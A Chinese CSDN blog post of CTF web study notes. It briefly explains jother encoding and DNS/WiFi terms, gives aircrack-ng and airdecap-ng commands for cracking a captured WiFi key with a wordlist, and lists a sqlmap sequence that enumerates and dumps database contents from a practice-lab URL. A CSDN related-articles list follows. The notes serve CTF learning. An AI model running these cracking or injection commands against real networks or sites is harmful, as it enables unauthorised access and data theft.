ctf web篇

最新推荐文章于 2020-11-02 17:08:34 发布
最新推荐文章于 2020-11-02 17:08:34 发布
阅读量548 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41472455/article/details/79794815
版权


jother 编码,包含  '{'     '}'     '('    ')'    '['    ']'    '!'    '+'

是一种运用于Javascript语言中 利用少量字符构造匿名函数的方法。


A (Address) 记录:    用来指定主机名(或域名)对应的IP地址记录。(DNS)

SSID   :一个局域网的名称,只有设置为名称相同SSID的值的电脑才能互相通信。(也可以写为ESSID)

BSSID :是一种特殊的Ad-hoc LAN的应用,一个无线网络至少由一个连接到有线网络的AP和若干无线工作站组成


aircrack-ng     用于破解WEP以及WPA-PSK密钥   (也可把加密的数据包解密成可读取的)一般kali自带。  

查看信息 aircrack-ng.exe  shipin.cap(补获的包名)

解密 aircrack-ng.exe shipin.cap -w top800.txt(字典)

       airdecap-ng.exe shipin.cap -e 0719 -p 88888888


sqlmap 工具介绍

注入地址:http://ctf5.shiyanbar.com/8/index.php?id=1

sqlmap -u http://ctf5.shiyanbar.com/8/index.php?id=1

暴库:sqlmap -u http://ctf5.shiyanbar.com/8/index.php?id=1 --dbs

显示某个数据库的表:sqlmap -u http://ctf5.shiyanbar.com/8/index.php?id=1 -D my_db(数据库) --tables

显示表列:sqlmap -u http://ctf5.shiyanbar.com/8/index.php?id=1 -D my_db(数据库) -T thiskey(数据表) --columns

下载列信息sqlmap -u http://ctf5.shiyanbar.com/8/index.php?id=1 -D my_db(数据库) -T thiskey -C k0y(列) --dump





笑傲code
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
CTF web总结--sql注入
bob的博客
08-30 1599
<?php include "common.php";if (isset($_POST["name"])){ $name = str_replace("'", "", trim($_POST["name"])); if (strlen($name) > 10){ echo("<script>alert('too long')</script>"); }else{ $sql
CTF-Web 类型总结.......
weixin_30362233的博客
07-17 479
1.Git泄露 2.代码审计 * php弱类型(==,===的问题) -https://cgctf.nuptsast.com/challenges#Web 02 ** ==是比较运算,它不会去检查条件式的表达式的类型 ** ===是恒等,它会检查查表达式的值与类型是否相等。 ** 当==比较数字和字符串的时候,会将字符串转换为数字在进行比较   1...
攻防世界复习web新手(7)
LGXJM20的博客
11-02 143
simple_php解题思路 描述:小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 思路:简单审计下代码,发现需要以get的方式传入两个参数a和b。 a参数的要求 a必须等于0且a为真 b参数的要求 b不能为数字且b大于1234 这道题的核心问题是理解PHP语言的弱类型,具体文章请参考:https://www.php.net/manual/zh/types.comparisons.php 构造参数a=x传入字符串x使a=0且为真,.is_numeric() 函数会判断如果是数字和数字字符
百度杯”CTF比赛 2017 二月场——Web-爆破-1
Ifish的博客
05-07 1192
题目描述 解题思路 打开链接 提示说flag在变量里,看到var_dump(),$$a时,就猜测是考察超全局变量GLOBALS 所以就构造http://7d30e96f64ea46cebb0bb8321544000282aff8f4efd34bb1.game.ichunqiu.com/?hello=GLOBALS 即可得到flag:flag{fa6d5cb6-9b98-4...
i春秋CTF-WEB-Code
苟有恒,必有三更眠,五更起。
09-05 797
分析 打开url,发现是一个读取文件的过程,一开始还以为是文件包含,其实直接读文件即可: /index.php?jpg=index.php 读了一下index.php的内容,base64解码得到index.php源码 &lt;?php /** * Created by PhpStorm. * Date: 2015/11/16 * Time: 1:3...
CTFweb篇——签到题
suiyideAli的博客
09-21 1万+
0x00 前言 一个简单的CTF签到题。 0x01.打开靶场 0x02 打开靶场地址发现信息,通过题目提示信息使用burpsuit抓包 Send to Repeater 然后查看 Repeater 点击GO 在Response中 Headers 找到Flag ok完成。 ...
CTF Web篇从菜鸟到精英
anquanniu的博客
09-16 1790
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球大会,以代替之前们通过互相发起真实***进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式。 入门CTF的内容会从CTFWEB、MISC、Crypto三个方向的各种漏洞原理学起,同时配合实际例题重现,这样有一个系统的学习过程,同时在各个点了解后,再进一步寻找大型赛事中较难的题目进行复现,进一步提升技能,拓展思路,增加自
CTFweb篇——GET&POST
热门推荐
suiyideAli的博客
09-21 2万+
0x00 前言 1. 首先使用BurpSuite 抓取一个http文件进行分析 2. 左边为请求信息,右边为响应信息;请求信息有三部分组成,分别为请求行、请求头、和请求正文组成。响应信息也有三部分组成,分别为响应行、响应 头、响应正文。 3. 首先可以看一下请求行 GET /index.php?tn=monline_3_dg HTTP/1.1 GET方法。GET方法用于获...
蓝鲸ctf web
qq_42520737的博客
08-09 1961
1、本地登陆 打开链接f之后出现返回信息getout 仅允许本地登陆  那么本地登陆的ip为127.0.0.1  登陆的admin=0,那么需要登陆则为1 flag:{Why_ar3_y0u_s0_dia0}   2、find me 页面源码     3、 http呀 题目提示很明显,存在跳过,将.html后缀改为.php  发现还是自动跳转原来的页面,证明存在东西就直接进行抓...
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
CTF Web资料.zip
09-27
CTF Web资料.zip
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
CTF工具之WEB.zip
10-07
该工具包中含有17年永久火狐浏览器,抓包工具,SQL注入工具,webshell,网站后台扫描工具,代码审计系统等
前18大旋转修整器企业占据全球87%的市场份额.docx
05-06
前18大旋转修整器企业占据全球87%的市场份额
Planet-SkySat-Imagery-Product-Specification-Jan2020.pdf
05-06
SKYSAT IMAGERY PRODUCT SPECIFICATION PLANET.COM VIDEO Full motion videos are collected between 30 and 120 seconds by a single camera from any of the active SkySats. Videos are collected using only the Panchromatic half of the camera, hence all videos are PAN only. Videos are packaged and delivered with a video mpeg-4 file, plus all image frames with accompanying video metadata and a frame index file (reference Product Types below)
Screenshot_20240506_133458_com.netease.yhtj.vivo.jpg
05-06
Screenshot_20240506_133458_com.netease.yhtj.vivo.jpg
2019年A~F题特等奖论文合集.pdf
最新发布
05-06
大学生,数学建模,美国大学生数学建模竞赛,MCM/ICM,历年美赛特等奖O奖论文
ctf web 思维导图
12-18
CTF(Capture The Flag)是一种网络安全竞赛,其中的Web领域涉及到了网页应用程序的漏洞挖掘和利用。下面是CTF Web思维导图的简要解释: CTF Web思维导图主要分为三个方面:Web漏洞类型、漏洞利用技术和解题方法。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值